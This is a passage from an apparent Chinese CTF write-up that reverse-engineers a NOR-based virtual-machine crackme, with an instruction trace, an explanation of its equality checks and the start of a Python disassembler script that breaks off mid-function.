0x13c1:reg=~(*(0x1389)|*(0x138a))
0x13c4:*(0x202f)=~reg
0x13c7:reg=~(*(0x202f)|*(0x306))
0x13ca:*(0x306)=~reg
0x13cd:*(0x2147)=*(0x2147)
0x13d3:*(0x202f)=*(0x1)
[*] ip=0x13d9:set ip to 0x13e2
0x13e2:*(0x13e0)=~(*(0x202f))
0x13e5:*(0x13e1)=~(*(0x2122))
[*] ip=0x13e8:set ip to 0x13f1
0x13f1:*(0x13ef)=~(*(0x202f))
0x13f4:*(0x13f0)=~(*(0x13e1))
0x13f7:reg=~(*(0x13ef)|*(0x13f0))
0x13fa:*(0x13e1)=reg
[*] ip=0x1400:set ip to 0x1409
0x1409:*(0x1407)=~(*(0x2122))
0x140c:*(0x1408)=~(*(0x13e0))
0x140f:reg=~(*(0x1407)|*(0x1408))
0x1412:*(0x13e0)=reg
0x1418:reg=~(*(0x13e0)|*(0x13e1))
0x141b:*(0x202f)=~reg
0x141e:reg=~(*(0x202f)|*(0x306))
0x1421:*(0x306)=~reg
0x1424:*(0x2148)=*(0x2148)
0x142a:*(0x202f)=*(0x1)
[*] ip=0x1430:set ip to 0x1439
0x1439:*(0x1437)=~(*(0x202f))
0x143c:*(0x1438)=~(*(0x2114))
[*] ip=0x143f:set ip to 0x1448
0x1448:*(0x1446)=~(*(0x202f))
0x144b:*(0x1447)=~(*(0x1438))
0x144e:reg=~(*(0x1446)|*(0x1447))
0x1451:*(0x1438)=reg
[*] ip=0x1457:set ip to 0x1460
0x1460:*(0x145e)=~(*(0x2114))
0x1463:*(0x145f)=~(*(0x1437))
0x1466:reg=~(*(0x145e)|*(0x145f))
0x1469:*(0x1437)=reg
0x146f:reg=~(*(0x1437)|*(0x1438))
0x1472:*(0x202f)=~reg
0x1475:reg=~(*(0x202f)|*(0x306))
0x1478:*(0x306)=~reg
[*] ip=0x147b:set ip to 0x1484
0x1484:*(0x1482)=~(*(0x2149))
0x1487:*(0x1483)=~(*(0x212d))
[*] ip=0x148a:set ip to 0x1493
0x1493:*(0x1491)=~(*(0x2149))
0x1496:*(0x1492)=~(*(0x1483))
0x1499:reg=~(*(0x1491)|*(0x1492))
0x149c:*(0x1483)=reg
[*] ip=0x14a2:set ip to 0x14ab
0x14ab:*(0x14a9)=~(*(0x212d))
0x14ae:*(0x14aa)=~(*(0x1482))
0x14b1:reg=~(*(0x14a9)|*(0x14aa))
0x14b4:*(0x1482)=reg
0x14ba:reg=~(*(0x1482)|*(0x1483))
0x14bd:*(0x202f)=~reg
[*] ip=0x14c0:set ip to 0x14c9
0x14c9:*(0x14c7)=~(*(0x202f))
0x14cc:*(0x14c8)=~(*(0x2115))
[*] ip=0x14cf:set ip to 0x14d8
0x14d8:*(0x14d6)=~(*(0x202f))
0x14db:*(0x14d7)=~(*(0x14c8))
0x14de:reg=~(*(0x14d6)|*(0x14d7))
0x14e1:*(0x14c8)=reg
[*] ip=0x14e7:set ip to 0x14f0
0x14f0:*(0x14ee)=~(*(0x2115))
0x14f3:*(0x14ef)=~(*(0x14c7))
0x14f6:reg=~(*(0x14ee)|*(0x14ef))
0x14f9:*(0x14c7)=reg
0x14ff:reg=~(*(0x14c7)|*(0x14c8))
0x1502:*(0x202f)=~reg
0x1505:reg=~(*(0x202f)|*(0x306))
0x1508:*(0x306)=~reg
0x150b:*(0x214a)=*(0x214a)
0x1511:*(0x202f)=*(0x1)
[*] ip=0x1517:set ip to 0x1520
0x1520:*(0x151e)=~(*(0x202f))
0x1523:*(0x151f)=~(*(0x212a))
[*] ip=0x1526:set ip to 0x152f
0x152f:*(0x152d)=~(*(0x202f))
0x1532:*(0x152e)=~(*(0x151f))
0x1535:reg=~(*(0x152d)|*(0x152e))
0x1538:*(0x151f)=reg
[*] ip=0x153e:set ip to 0x1547
0x1547:*(0x1545)=~(*(0x212a))
0x154a:*(0x1546)=~(*(0x151e))
0x154d:reg=~(*(0x1545)|*(0x1546))
0x1550:*(0x151e)=reg
0x1556:reg=~(*(0x151e)|*(0x151f))
0x1559:*(0x202f)=~reg
0x155c:reg=~(*(0x202f)|*(0x306))
0x155f:*(0x306)=~reg
0x1562:*(0x202f)=*(0x214b)
0x161c:rol(*(0x202f), 15)
[*] ip=0x161c:set ip to 0x1625
0x1625:*(0x1623)=~(*(0x202f))
0x1628:*(0x1624)=~(*(0x212e))
[*] ip=0x162b:set ip to 0x1634
0x1634:*(0x1632)=~(*(0x202f))
0x1637:*(0x1633)=~(*(0x1624))
0x163a:reg=~(*(0x1632)|*(0x1633))
0x163d:*(0x1624)=reg
[*] ip=0x1643:set ip to 0x164c
0x164c:*(0x164a)=~(*(0x212e))
0x164f:*(0x164b)=~(*(0x1623))
0x1652:reg=~(*(0x164a)|*(0x164b))
0x1655:*(0x1623)=reg
0x165b:reg=~(*(0x1623)|*(0x1624))
0x165e:*(0x202f)=~reg
0x1661:reg=~(*(0x202f)|*(0x306))
0x1664:*(0x306)=~reg
[*] ip=0x1667:set ip to 0x1670
0x1670:*(0x166e)=~(*(0x214c))
0x1673:*(0x166f)=~(*(0x2118))
[*] ip=0x1676:set ip to 0x167f
0x167f:*(0x167d)=~(*(0x214c))
0x1682:*(0x167e)=~(*(0x166f))
0x1685:reg=~(*(0x167d)|*(0x167e))
0x1688:*(0x166f)=reg
[*] ip=0x168e:set ip to 0x1697
0x1697:*(0x1695)=~(*(0x2118))
0x169a:*(0x1696)=~(*(0x166e))
0x169d:reg=~(*(0x1695)|*(0x1696))
0x16a0:*(0x166e)=reg
0x16a6:reg=~(*(0x166e)|*(0x166f))
0x16a9:*(0x202f)=~reg
[*] ip=0x16ac:set ip to 0x16b5
0x16b5:*(0x16b3)=~(*(0x202f))
0x16b8:*(0x16b4)=~(*(0x2131))
[*] ip=0x16bb:set ip to 0x16c4
0x16c4:*(0x16c2)=~(*(0x202f))
0x16c7:*(0x16c3)=~(*(0x16b4))
0x16ca:reg=~(*(0x16c2)|*(0x16c3))
0x16cd:*(0x16b4)=reg
[*] ip=0x16d3:set ip to 0x16dc
0x16dc:*(0x16da)=~(*(0x2131))
0x16df:*(0x16db)=~(*(0x16b3))
0x16e2:reg=~(*(0x16da)|*(0x16db))
0x16e5:*(0x16b3)=reg
0x16eb:reg=~(*(0x16b3)|*(0x16b4))
0x16ee:*(0x202f)=~reg
0x16f1:reg=~(*(0x202f)|*(0x306))
0x16f4:*(0x306)=~reg
0x16f7:*(0x202f)=*(0x214d)
0x17b1:rol(*(0x202f), 15)
[*] ip=0x17b1:set ip to 0x17ba
0x17ba:*(0x17b8)=~(*(0x202f))
0x17bd:*(0x17b9)=~(*(0x2129))
[*] ip=0x17c0:set ip to 0x17c9
0x17c9:*(0x17c7)=~(*(0x202f))
0x17cc:*(0x17c8)=~(*(0x17b9))
0x17cf:reg=~(*(0x17c7)|*(0x17c8))
0x17d2:*(0x17b9)=reg
[*] ip=0x17d8:set ip to 0x17e1
0x17e1:*(0x17df)=~(*(0x2129))
0x17e4:*(0x17e0)=~(*(0x17b8))
0x17e7:reg=~(*(0x17df)|*(0x17e0))
0x17ea:*(0x17b8)=reg
0x17f0:reg=~(*(0x17b8)|*(0x17b9))
0x17f3:*(0x202f)=~reg
0x17f6:reg=~(*(0x202f)|*(0x306))
0x17f9:*(0x306)=~reg
[*] ip=0x17fc:set ip to 0x1805
0x1805:*(0x1803)=~(*(0x214e))
0x1808:*(0x1804)=~(*(0x211e))
[*] ip=0x180b:set ip to 0x1814
0x1814:*(0x1812)=~(*(0x214e))
0x1817:*(0x1813)=~(*(0x1804))
0x181a:reg=~(*(0x1812)|*(0x1813))
0x181d:*(0x1804)=reg
[*] ip=0x1823:set ip to 0x182c
0x182c:*(0x182a)=~(*(0x211e))
0x182f:*(0x182b)=~(*(0x1803))
0x1832:reg=~(*(0x182a)|*(0x182b))
0x1835:*(0x1803)=reg
0x183b:reg=~(*(0x1803)|*(0x1804))
0x183e:*(0x202f)=~reg
[*] ip=0x1841:set ip to 0x184a
0x184a:*(0x1848)=~(*(0x202f))
0x184d:*(0x1849)=~(*(0x212c))
[*] ip=0x1850:set ip to 0x1859
0x1859:*(0x1857)=~(*(0x202f))
0x185c:*(0x1858)=~(*(0x1849))
0x185f:reg=~(*(0x1857)|*(0x1858))
0x1862:*(0x1849)=reg
[*] ip=0x1868:set ip to 0x1871
0x1871:*(0x186f)=~(*(0x212c))
0x1874:*(0x1870)=~(*(0x1848))
0x1877:reg=~(*(0x186f)|*(0x1870))
0x187a:*(0x1848)=reg
0x1880:reg=~(*(0x1848)|*(0x1849))
0x1883:*(0x202f)=~reg
0x1886:reg=~(*(0x202f)|*(0x306))
0x1889:*(0x306)=~reg
0x188c:*(0x214f)=*(0x214f)
0x1892:*(0x202f)=*(0x1)
[*] ip=0x1898:set ip to 0x18a1
0x18a1:*(0x189f)=~(*(0x202f))
0x18a4:*(0x18a0)=~(*(0x2130))
[*] ip=0x18a7:set ip to 0x18b0
0x18b0:*(0x18ae)=~(*(0x202f))
0x18b3:*(0x18af)=~(*(0x18a0))
0x18b6:reg=~(*(0x18ae)|*(0x18af))
0x18b9:*(0x18a0)=reg
[*] ip=0x18bf:set ip to 0x18c8
0x18c8:*(0x18c6)=~(*(0x2130))
0x18cb:*(0x18c7)=~(*(0x189f))
0x18ce:reg=~(*(0x18c6)|*(0x18c7))
0x18d1:*(0x189f)=reg
0x18d7:reg=~(*(0x189f)|*(0x18a0))
0x18da:*(0x202f)=~reg
0x18dd:reg=~(*(0x202f)|*(0x306))
0x18e0:*(0x306)=~reg
0x18e3:*(0x202f)=*(0x2150)
0x199d:rol(*(0x202f), 15)
[*] ip=0x199d:set ip to 0x19a6
0x19a6:*(0x19a4)=~(*(0x202f))
0x19a9:*(0x19a5)=~(*(0x212e))
[*] ip=0x19ac:set ip to 0x19b5
0x19b5:*(0x19b3)=~(*(0x202f))
0x19b8:*(0x19b4)=~(*(0x19a5))
0x19bb:reg=~(*(0x19b3)|*(0x19b4))
0x19be:*(0x19a5)=reg
[*] ip=0x19c4:set ip to 0x19cd
0x19cd:*(0x19cb)=~(*(0x212e))
0x19d0:*(0x19cc)=~(*(0x19a4))
0x19d3:reg=~(*(0x19cb)|*(0x19cc))
0x19d6:*(0x19a4)=reg
0x19dc:reg=~(*(0x19a4)|*(0x19a5))
0x19df:*(0x202f)=~reg
0x19e2:reg=~(*(0x202f)|*(0x306))
0x19e5:*(0x306)=~reg
0x19e8:*(0x2151)=*(0x2151)
0x19ee:*(0x202f)=*(0x1)
[*] ip=0x19f4:set ip to 0x19fd
0x19fd:*(0x19fb)=~(*(0x202f))
0x1a00:*(0x19fc)=~(*(0x211c))
[*] ip=0x1a03:set ip to 0x1a0c
0x1a0c:*(0x1a0a)=~(*(0x202f))
0x1a0f:*(0x1a0b)=~(*(0x19fc))
0x1a12:reg=~(*(0x1a0a)|*(0x1a0b))
0x1a15:*(0x19fc)=reg
[*] ip=0x1a1b:set ip to 0x1a24
0x1a24:*(0x1a22)=~(*(0x211c))
0x1a27:*(0x1a23)=~(*(0x19fb))
0x1a2a:reg=~(*(0x1a22)|*(0x1a23))
0x1a2d:*(0x19fb)=reg
0x1a33:reg=~(*(0x19fb)|*(0x19fc))
0x1a36:*(0x202f)=~reg
0x1a39:reg=~(*(0x202f)|*(0x306))
0x1a3c:*(0x306)=~reg
[*] ip=0x1a3f:set ip to 0x1a48
0x1a48:*(0x1a46)=~(*(0x2152))
0x1a4b:*(0x1a47)=~(*(0x2119))
[*] ip=0x1a4e:set ip to 0x1a57
0x1a57:*(0x1a55)=~(*(0x2152))
0x1a5a:*(0x1a56)=~(*(0x1a47))
0x1a5d:reg=~(*(0x1a55)|*(0x1a56))
0x1a60:*(0x1a47)=reg
[*] ip=0x1a66:set ip to 0x1a6f
0x1a6f:*(0x1a6d)=~(*(0x2119))
0x1a72:*(0x1a6e)=~(*(0x1a46))
0x1a75:reg=~(*(0x1a6d)|*(0x1a6e))
0x1a78:*(0x1a46)=reg
0x1a7e:reg=~(*(0x1a46)|*(0x1a47))
0x1a81:*(0x202f)=~reg
[*] ip=0x1a84:set ip to 0x1a8d
0x1a8d:*(0x1a8b)=~(*(0x202f))
0x1a90:*(0x1a8c)=~(*(0x2128))
[*] ip=0x1a93:set ip to 0x1a9c
0x1a9c:*(0x1a9a)=~(*(0x202f))
0x1a9f:*(0x1a9b)=~(*(0x1a8c))
0x1aa2:reg=~(*(0x1a9a)|*(0x1a9b))
0x1aa5:*(0x1a8c)=reg
[*] ip=0x1aab:set ip to 0x1ab4
0x1ab4:*(0x1ab2)=~(*(0x2128))
0x1ab7:*(0x1ab3)=~(*(0x1a8b))
0x1aba:reg=~(*(0x1ab2)|*(0x1ab3))
0x1abd:*(0x1a8b)=reg
0x1ac3:reg=~(*(0x1a8b)|*(0x1a8c))
0x1ac6:*(0x202f)=~reg
0x1ac9:reg=~(*(0x202f)|*(0x306))
0x1acc:*(0x306)=~reg
[*] ip=0x1acf:set ip to 0x1ad8
0x1ad8:*(0x1ad6)=~(*(0x2153))
0x1adb:*(0x1ad7)=~(*(0x212f))
[*] ip=0x1ade:set ip to 0x1ae7
0x1ae7:*(0x1ae5)=~(*(0x2153))
0x1aea:*(0x1ae6)=~(*(0x1ad7))
0x1aed:reg=~(*(0x1ae5)|*(0x1ae6))
0x1af0:*(0x1ad7)=reg
[*] ip=0x1af6:set ip to 0x1aff
0x1aff:*(0x1afd)=~(*(0x212f))
0x1b02:*(0x1afe)=~(*(0x1ad6))
0x1b05:reg=~(*(0x1afd)|*(0x1afe))
0x1b08:*(0x1ad6)=reg
0x1b0e:reg=~(*(0x1ad6)|*(0x1ad7))
0x1b11:*(0x202f)=~reg
[*] ip=0x1b14:set ip to 0x1b1d
0x1b1d:*(0x1b1b)=~(*(0x202f))
0x1b20:*(0x1b1c)=~(*(0x2122))
[*] ip=0x1b23:set ip to 0x1b2c
0x1b2c:*(0x1b2a)=~(*(0x202f))
0x1b2f:*(0x1b2b)=~(*(0x1b1c))
0x1b32:reg=~(*(0x1b2a)|*(0x1b2b))
0x1b35:*(0x1b1c)=reg
[*] ip=0x1b3b:set ip to 0x1b44
0x1b44:*(0x1b42)=~(*(0x2122))
0x1b47:*(0x1b43)=~(*(0x1b1b))
0x1b4a:reg=~(*(0x1b42)|*(0x1b43))
0x1b4d:*(0x1b1b)=reg
0x1b53:reg=~(*(0x1b1b)|*(0x1b1c))
0x1b56:*(0x202f)=~reg
0x1b59:reg=~(*(0x202f)|*(0x306))
0x1b5c:*(0x306)=~reg
[*] ip=0x1b5f:set ip to 0x1b68
0x1b68:*(0x1b66)=~(*(0x2154))
0x1b6b:*(0x1b67)=~(*(0x211a))
[*] ip=0x1b6e:set ip to 0x1b77
0x1b77:*(0x1b75)=~(*(0x2154))
0x1b7a:*(0x1b76)=~(*(0x1b67))
0x1b7d:reg=~(*(0x1b75)|*(0x1b76))
0x1b80:*(0x1b67)=reg
[*] ip=0x1b86:set ip to 0x1b8f
0x1b8f:*(0x1b8d)=~(*(0x211a))
0x1b92:*(0x1b8e)=~(*(0x1b66))
0x1b95:reg=~(*(0x1b8d)|*(0x1b8e))
0x1b98:*(0x1b66)=reg
0x1b9e:reg=~(*(0x1b66)|*(0x1b67))
0x1ba1:*(0x202f)=~reg
[*] ip=0x1ba4:set ip to 0x1bad
0x1bad:*(0x1bab)=~(*(0x202f))
0x1bb0:*(0x1bac)=~(*(0x2120))
[*] ip=0x1bb3:set ip to 0x1bbc
0x1bbc:*(0x1bba)=~(*(0x202f))
0x1bbf:*(0x1bbb)=~(*(0x1bac))
0x1bc2:reg=~(*(0x1bba)|*(0x1bbb))
0x1bc5:*(0x1bac)=reg
[*] ip=0x1bcb:set ip to 0x1bd4
0x1bd4:*(0x1bd2)=~(*(0x2120))
0x1bd7:*(0x1bd3)=~(*(0x1bab))
0x1bda:reg=~(*(0x1bd2)|*(0x1bd3))
0x1bdd:*(0x1bab)=reg
0x1be3:reg=~(*(0x1bab)|*(0x1bac))
0x1be6:*(0x202f)=~reg
0x1be9:reg=~(*(0x202f)|*(0x306))
0x1bec:*(0x306)=~reg
0x1bef:*(0x202f)=*(0x2155)
0x1ca9:rol(*(0x202f), 15)
[*] ip=0x1ca9:set ip to 0x1cb2
0x1cb2:*(0x1cb0)=~(*(0x202f))
0x1cb5:*(0x1cb1)=~(*(0x212e))
[*] ip=0x1cb8:set ip to 0x1cc1
0x1cc1:*(0x1cbf)=~(*(0x202f))
0x1cc4:*(0x1cc0)=~(*(0x1cb1))
0x1cc7:reg=~(*(0x1cbf)|*(0x1cc0))
0x1cca:*(0x1cb1)=reg
[*] ip=0x1cd0:set ip to 0x1cd9
0x1cd9:*(0x1cd7)=~(*(0x212e))
0x1cdc:*(0x1cd8)=~(*(0x1cb0))
0x1cdf:reg=~(*(0x1cd7)|*(0x1cd8))
0x1ce2:*(0x1cb0)=reg
0x1ce8:reg=~(*(0x1cb0)|*(0x1cb1))
0x1ceb:*(0x202f)=~reg
0x1cee:reg=~(*(0x202f)|*(0x306))
0x1cf1:*(0x306)=~reg
[*] ip=0x1cf4:set ip to 0x1cfd
0x1cfd:*(0x1cfb)=~(*(0x2156))
0x1d00:*(0x1cfc)=~(*(0x2127))
[*] ip=0x1d03:set ip to 0x1d0c
0x1d0c:*(0x1d0a)=~(*(0x2156))
0x1d0f:*(0x1d0b)=~(*(0x1cfc))
0x1d12:reg=~(*(0x1d0a)|*(0x1d0b))
0x1d15:*(0x1cfc)=reg
[*] ip=0x1d1b:set ip to 0x1d24
0x1d24:*(0x1d22)=~(*(0x2127))
0x1d27:*(0x1d23)=~(*(0x1cfb))
0x1d2a:reg=~(*(0x1d22)|*(0x1d23))
0x1d2d:*(0x1cfb)=reg
0x1d33:reg=~(*(0x1cfb)|*(0x1cfc))
0x1d36:*(0x202f)=~reg
[*] ip=0x1d39:set ip to 0x1d42
0x1d42:*(0x1d40)=~(*(0x202f))
0x1d45:*(0x1d41)=~(*(0x2117))
[*] ip=0x1d48:set ip to 0x1d51
0x1d51:*(0x1d4f)=~(*(0x202f))
0x1d54:*(0x1d50)=~(*(0x1d41))
0x1d57:reg=~(*(0x1d4f)|*(0x1d50))
0x1d5a:*(0x1d41)=reg
[*] ip=0x1d60:set ip to 0x1d69
0x1d69:*(0x1d67)=~(*(0x2117))
0x1d6c:*(0x1d68)=~(*(0x1d40))
0x1d6f:reg=~(*(0x1d67)|*(0x1d68))
0x1d72:*(0x1d40)=reg
0x1d78:reg=~(*(0x1d40)|*(0x1d41))
0x1d7b:*(0x202f)=~reg
0x1d7e:reg=~(*(0x202f)|*(0x306))
0x1d81:*(0x306)=~reg
0x1d84:*(0x2157)=*(0x2157)
0x1d8a:*(0x202f)=*(0x1)
[*] ip=0x1d90:set ip to 0x1d99
0x1d99:*(0x1d97)=~(*(0x202f))
0x1d9c:*(0x1d98)=~(*(0x2122))
[*] ip=0x1d9f:set ip to 0x1da8
0x1da8:*(0x1da6)=~(*(0x202f))
0x1dab:*(0x1da7)=~(*(0x1d98))
0x1dae:reg=~(*(0x1da6)|*(0x1da7))
0x1db1:*(0x1d98)=reg
[*] ip=0x1db7:set ip to 0x1dc0
0x1dc0:*(0x1dbe)=~(*(0x2122))
0x1dc3:*(0x1dbf)=~(*(0x1d97))
0x1dc6:reg=~(*(0x1dbe)|*(0x1dbf))
0x1dc9:*(0x1d97)=reg
0x1dcf:reg=~(*(0x1d97)|*(0x1d98))
0x1dd2:*(0x202f)=~reg
0x1dd5:reg=~(*(0x202f)|*(0x306))
0x1dd8:*(0x306)=~reg
[*] ip=0x1ddb:set ip to 0x1de4
0x1de4:*(0x1de2)=~(*(0x2158))
0x1de7:*(0x1de3)=~(*(0x211a))
[*] ip=0x1dea:set ip to 0x1df3
0x1df3:*(0x1df1)=~(*(0x2158))
0x1df6:*(0x1df2)=~(*(0x1de3))
0x1df9:reg=~(*(0x1df1)|*(0x1df2))
0x1dfc:*(0x1de3)=reg
[*] ip=0x1e02:set ip to 0x1e0b
0x1e0b:*(0x1e09)=~(*(0x211a))
0x1e0e:*(0x1e0a)=~(*(0x1de2))
0x1e11:reg=~(*(0x1e09)|*(0x1e0a))
0x1e14:*(0x1de2)=reg
0x1e1a:reg=~(*(0x1de2)|*(0x1de3))
0x1e1d:*(0x202f)=~reg
[*] ip=0x1e20:set ip to 0x1e29
0x1e29:*(0x1e27)=~(*(0x202f))
0x1e2c:*(0x1e28)=~(*(0x2121))
[*] ip=0x1e2f:set ip to 0x1e38
0x1e38:*(0x1e36)=~(*(0x202f))
0x1e3b:*(0x1e37)=~(*(0x1e28))
0x1e3e:reg=~(*(0x1e36)|*(0x1e37))
0x1e41:*(0x1e28)=reg
[*] ip=0x1e47:set ip to 0x1e50
0x1e50:*(0x1e4e)=~(*(0x2121))
0x1e53:*(0x1e4f)=~(*(0x1e27))
0x1e56:reg=~(*(0x1e4e)|*(0x1e4f))
0x1e59:*(0x1e27)=reg
0x1e5f:reg=~(*(0x1e27)|*(0x1e28))
0x1e62:*(0x202f)=~reg
0x1e65:reg=~(*(0x202f)|*(0x306))
0x1e68:*(0x306)=~reg
0x1e6b:*(0x2159)=*(0x2159)
0x1e71:*(0x202f)=*(0x1)
[*] ip=0x1e77:set ip to 0x1e80
0x1e80:*(0x1e7e)=~(*(0x202f))
0x1e83:*(0x1e7f)=~(*(0x2134))
[*] ip=0x1e86:set ip to 0x1e8f
0x1e8f:*(0x1e8d)=~(*(0x202f))
0x1e92:*(0x1e8e)=~(*(0x1e7f))
0x1e95:reg=~(*(0x1e8d)|*(0x1e8e))
0x1e98:*(0x1e7f)=reg
[*] ip=0x1e9e:set ip to 0x1ea7
0x1ea7:*(0x1ea5)=~(*(0x2134))
0x1eaa:*(0x1ea6)=~(*(0x1e7e))
0x1ead:reg=~(*(0x1ea5)|*(0x1ea6))
0x1eb0:*(0x1e7e)=reg
0x1eb6:reg=~(*(0x1e7e)|*(0x1e7f))
0x1eb9:*(0x202f)=~reg
0x1ebc:reg=~(*(0x202f)|*(0x306))
0x1ebf:*(0x306)=~reg
0x1ec2:reg=0x0
0x1ecd:*(0x8)=~reg
0x1ed0:reg=~(*(0x8)|*(0x306))
0x1ed3:*(0x8)=~reg
0x1ee2:rol(*(0x8), 1)
0x1ee2:reg=~(*(0x8)|*(0x306))
0x1ee5:*(0x8)=~reg
0x1ef4:rol(*(0x8), 1)
0x1ef4:reg=~(*(0x8)|*(0x306))
0x1ef7:*(0x8)=~reg
0x1f06:rol(*(0x8), 1)
0x1f06:reg=~(*(0x8)|*(0x306))
0x1f09:*(0x8)=~reg
0x1f18:rol(*(0x8), 1)
0x1f18:reg=~(*(0x8)|*(0x306))
0x1f1b:*(0x8)=~reg
0x1f2a:rol(*(0x8), 1)
0x1f2a:reg=~(*(0x8)|*(0x306))
0x1f2d:*(0x8)=~reg
0x1f3c:rol(*(0x8), 1)
0x1f3c:reg=~(*(0x8)|*(0x306))
0x1f3f:*(0x8)=~reg
0x1f4e:rol(*(0x8), 1)
0x1f4e:reg=~(*(0x8)|*(0x306))
0x1f51:*(0x8)=~reg
0x1f60:rol(*(0x8), 1)
0x1f60:reg=~(*(0x8)|*(0x306))
0x1f63:*(0x8)=~reg
0x1f72:rol(*(0x8), 1)
0x1f72:reg=~(*(0x8)|*(0x306))
0x1f75:*(0x8)=~reg
0x1f84:rol(*(0x8), 1)
0x1f84:reg=~(*(0x8)|*(0x306))
0x1f87:*(0x8)=~reg
0x1f96:rol(*(0x8), 1)
0x1f96:reg=~(*(0x8)|*(0x306))
0x1f99:*(0x8)=~reg
0x1fa8:rol(*(0x8), 1)
0x1fa8:reg=~(*(0x8)|*(0x306))
0x1fab:*(0x8)=~reg
0x1fba:rol(*(0x8), 1)
0x1fba:reg=~(*(0x8)|*(0x306))
0x1fbd:*(0x8)=~reg
0x1fcc:rol(*(0x8), 1)
0x1fcc:reg=~(*(0x8)|*(0x306))
0x1fcf:*(0x8)=~reg
0x1fde:rol(*(0x8), 1)
0x1fde:reg=~(*(0x8)|*(0x306))
0x1fe1:*(0x8)=~reg
[*] ip=0x1fe4:set ip to 0x1fed
[*] ip=0x1fed:set ip to 0x1ff6
[*] ip=0x1ff6:set ip to 0x1fff
0x1fff:*(0x1ffd)=~(*(0x1fec))
0x2002:*(0x1ffe)=~(*(0x8))
0x2005:reg=~(*(0x1ffd)|*(0x1ffe))
0x2008:*(0x1ff4)=reg
0x200e:*(0x1ff5)=~(*(0x8))
[*] ip=0x2011:set ip to 0x201a
0x201a:*(0x2018)=~(*(0x1feb))
0x201d:*(0x2019)=~(*(0x1ff5))
0x2020:reg=~(*(0x2018)|*(0x2019))
0x2023:*(0x1ff5)=reg
0x2029:reg=~(*(0x1ff4)|*(0x1ff5))
[*] ip=0x202c:set ip to 0x0
error at ip=0x202c

观察后可以知道0x306是一个很关键的标志,程序将输入的字符进行某种运算后再与0x306位置进行运算。而0x1ecd位置处开始则像是对能否得到flag的判断,其中有对0x306处的移位操作,那猜测能得到flag的条件无非是0x306为0xffff或0,经过动调验证发现0x306位置必须为0。

现在再跟踪对输入字符的运算,比如从0x5c3开始的部分,可以大致简化如下:

1
2
3
4
5
6
*(0x202f)=*(0x2137)
rol(*(0x202f), 15)
*(0x685)=~(~(*(0x202f))|*(0x212c))
*(0x684)=~(~(*(0x212c))|*(0x202f))
*(0x202f)=(*(0x684)|*(0x685))
*(0x306)=(*(0x202f)|*(0x306))

由此可得0x202f处要为0。注意到位运算有如下特征:若(~(~a|b))|(~(~b|a))==0,则a==b,因此这里是在移位后判断相等。类似地,程序中还包含另外两种加密方式:移动1位,和进行或运算。通过脚本输出的指令,我们可以很好判断对应位置使用的加密方式,得到如下解题脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
from pwn import *
#context.log_level='warning'
ip = 300
reg=0
originalCode=b'\x00'*600+open('code.bin','rb').read()
CodeList=[]
assert(len(originalCode)%2==0)
for i in range(len(originalCode)//2):
    CodeList.append(u16(originalCode[i*2:i*2+2]))

def rol(num):
    assert(0<=num<=0xffff)
    return ((num<<1)&0xffff)+(num>>15)

def rol_back(num):
    assert(0<=num<=0xffff)
    return (num>>1)+(num%2)*(1<<15)

def rev(num):
    return (~num)&0xffff

def jmp(addr):
    global ip
    info(f'ip={hex(ip)}:set ip to {hex(addr)}')
    if addr-ip>30 or addr-ip<0:
        input(f"error at ip={hex(ip)}")
    ip=addr

def pattern_nor_reg(code):
    src0,src1,dst=code[0],code[1],code[2]
    if dst!=7:
        return -1
    return [src0,src1]

def nor_reg_handler(result):
    reg=0xffffffff
    return f'reg=~(*({hex(result[0])})|*({hex(result[1])}))'

def pattern_not(code):
    src0,src1,dst=code[0],code[1],code[2]
    if src0!=src1:
        return -1
    return [src0,dst]

def not_handler(result):
    return f'*({hex(result[1])})=~(*({hex(result[0])}))'

def pattern_load_reg(code):
    src0,src1,dst=code[0],code[1],code[2]
    if src0!=src1 or dst!=7:
        return -1
    return src0

def load_reg_handler(result):
    reg=rev(CodeList[result])
    return f'reg=~(*({hex(result)}))'

def pattern_save_reg(code):
    src0,src1,dst=code[0],code[1],code[2]
    if src0!=src1 or src0!=7:
        return -1
    return dst

def save_reg_handler(result):
    global reg
    global ip
    if result==0:
        jmp(reg)
        info('regjump')
        ip-=3
        return
    return f'*({hex(result)})=~reg'

def pattern_jmp(code):
    addr=pattern_load_reg(code)
    if addr==-1:
        return -1
    code=code[3:]
    src0,src1,dst=code[0],code[1],code[2]
    if src0==src1==7 and dst==0:
        return addr
    return -1

def jmp_handler(result):
    jmp(CodeList[result])

def pattern_load_imm(code):
    addr=pattern_jmp(code)
    if addr==-1:
        return -1
    if not (CodeList[addr]-addr==2 and pattern_load_reg(code[8:])==addr+1):
        return -1
    return code[7]

def load_imm_handler(result):
    global reg
    reg=result
    return f'reg={hex(result)}'

def pattern_put(code):
    chraddr=pattern_load_reg(code)
    if chraddr==-1:
        return -1
    code=code[3:]
    pos=pattern_save_reg(code)
    if pos!=3:
        return -1
    code=code[3:]
    imm=pattern_load_imm(code)
    if imm!=1:
        return -1
    code=code[11:]
    pos=pattern_save_reg(code)
    if pos!=4:
        return -1
    return chraddr

def put_handler(result):
    return f"putchar('{chr(CodeList[result])}')"

def pattern_get(code):
    imm=pattern_load_imm(code)
    if imm!=1:
        return -1
    code=code[11:]
    pos=pattern_save_reg(code)
    if pos!=6:
        return -1
    code=code[3:]
    pos=pattern_load_reg(code)
    if pos!=5:
        return -1
    code=code[3:]
    addr=pattern_save_reg(code)
    if addr==-1:
        return -1
    return addr

def get_handler(result):
    return f"*({hex(result)})=getchar()"

def pattern_load_mem(code):
    addrsrc=pattern_load_reg(code)
    code=code[3:]
    addrdst=pattern_save_reg(code)
